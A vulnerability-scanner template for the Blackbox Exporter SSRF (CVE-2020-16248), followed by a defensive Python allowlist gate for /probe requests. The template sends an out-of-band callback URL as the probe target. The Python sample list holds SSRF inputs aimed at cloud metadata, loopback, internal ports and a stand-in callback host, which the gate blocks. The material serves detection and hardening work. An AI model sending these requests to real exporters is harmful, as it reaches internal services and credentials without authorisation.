id: CVE-2020-16248

info:
  name: Prometheus Blackbox Exporter - Server-Side Request Forgery (SSRF)
  author: DhiyaneshDk
  severity: medium
  description: |
    Prometheus Blackbox Exporter through 0.17.0 does not sanitize the target parameter of the /probe endpoint. An attacker who can reach the exporter sends a crafted target value, and the exporter connects to that host on the attacker's behalf (server-side request forgery).
  impact: |
    Attackers can use the exporter to reach internal services it can route to, and repeated probes can cause denial of service.
  remediation: |
    Update to version 0.17.1 or later to fix the vulnerability. Following the Prometheus security model (see the exporters section of the security docs referenced below), do not expose the exporter to untrusted networks: restrict access to /probe to the Prometheus servers that scrape it, for example with a firewall or an authenticating reverse proxy.
  reference:
    - https://github.com/prometheus/blackbox_exporter/issues/669
    - https://nvd.nist.gov/vuln/detail/CVE-2020-16248
    - https://prometheus.io/docs/operating/security/#exporters
    - https://www.openwall.com/lists/oss-security/2020/08/08/3
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
    cvss-score: 5.8
    cve-id: CVE-2020-16248
    epss-score: 0.0582
    epss-percentile: 0.90682
    cwe-id: CWE-918
  metadata:
    max-request: 1
    shodan-query: title:"Blackbox Exporter"
    fofa-query: title="Blackbox Exporter"
    verified: true
    vendor: prometheus
    product: blackbox_exporter
  tags: cve,cve2020,ssrf,prometheus,blackbox-exporter,oast,oob

http:
  - method: GET
    path:
      - "{{BaseURL}}/probe?target={{interactsh-url}}&module=http_2xx"

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - 'contains(body, "probe_dns_lookup_time_seconds")'
        condition: and
# digest: 490a00463044022044d763c5aefe395c3f1362b167b29634c6250e8d5971572022eed7b92ca51cb402205cd611ae63da58c8825dd2de40a63e67ed44fa958c99fdb715314901548a0b0a:922c64590222798bb761d5b6d8e72950
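The template above exercises the SSRF by handing the exporter an out-of-band callback as `target`. The following is an added example, not code from the template or from blackbox_exporter, of the mitigating control a practitioner would put in front of an exporter that cannot be upgraded or fully isolated: an allowlist gate on `/probe` requests, as a reverse proxy or auth middleware would apply it before forwarding. The allowed hostnames, the allowed network and the sample request lines are constructed for the example; the module names (`http_2xx`, `tcp_connect`, `icmp`) are the exporter's own.

```python
"""Allowlist gate for blackbox_exporter /probe requests.

Added example, not blackbox_exporter code. Runs in front of the exporter
(reverse proxy or middleware); policy values and sample requests are
constructed for illustration.
"""
import ipaddress
from urllib.parse import parse_qs, urlsplit

# Hypothetical policy: the only things this exporter may be asked to probe.
ALLOWED_HOSTS = {"example.org", "db.internal.example"}
ALLOWED_NETS = [ipaddress.ip_network("10.0.0.0/8")]

# Constructed request lines as a proxy would see them: a benign probe, a
# cloud-metadata SSRF attempt, an internal TCP probe, an out-of-band callback
# of the kind the nuclei template sends, a loopback probe and a missing target.
SAMPLE_REQUESTS = [
    "/probe?target=https://example.org&module=http_2xx",
    "/probe?target=http://169.254.169.254/latest/meta-data/&module=http_2xx",
    "/probe?target=10.0.0.5:22&module=tcp_connect",
    "/probe?target=http://callback.oast.example&module=http_2xx",
    "/probe?target=http://[::1]:9115/&module=http_2xx",
    "/probe?module=icmp",
]


def extract_host(target):
    """Return the host of a probe target, or None if there is none.

    http_* modules take a URL; tcp_connect, icmp and dns modules take a bare
    host or host:port, which urlsplit only parses as a netloc after '//'.
    """
    if "://" not in target:
        target = "//" + target
    try:
        return urlsplit(target).hostname
    except ValueError:  # malformed IPv6 brackets and similar
        return None


def is_allowed_target(target):
    """True only for an allowlisted hostname or an IP inside an allowlisted
    network. Loopback, link-local and unspecified addresses are always refused,
    including when hidden behind an IPv4-mapped IPv6 literal."""
    host = extract_host(target)
    if not host:
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal: plain hostname allowlist. The exporter, not this
        # gate, resolves the name, so this does not cover DNS rebinding.
        return host.lower().rstrip(".") in ALLOWED_HOSTS
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    if ip.is_loopback or ip.is_link_local or ip.is_unspecified:
        return False
    return any(ip in net for net in ALLOWED_NETS)


def gate_probe_request(request_target):
    """Decide whether a request (path plus query) may be forwarded."""
    parts = urlsplit(request_target)
    if parts.path.rstrip("/") != "/probe":
        return True  # /metrics and the landing page are not SSRF sinks
    targets = parse_qs(parts.query).get("target", [])
    if len(targets) != 1:
        return False  # missing or repeated target: refuse rather than guess
    return is_allowed_target(targets[0])


def audit(requests):
    """Map each request line to its forward/block decision."""
    return {req: gate_probe_request(req) for req in requests}


if __name__ == "__main__":
    for req, allowed in audit(SAMPLE_REQUESTS).items():
        print("FORWARD" if allowed else "BLOCK  ", req)
```

Two caveats when deploying something like this. First, the gate only sees the literal `target`; a hostname on the allowlist is resolved by the exporter at probe time, so an attacker who controls that name's DNS can still point it at an internal address, which is why the network-level restriction recommended in the remediation above remains the primary control. Second, the path comparison must be done on the normalised path the exporter will actually route, or an encoded or doubled-slash variant of `/probe` slips past the check.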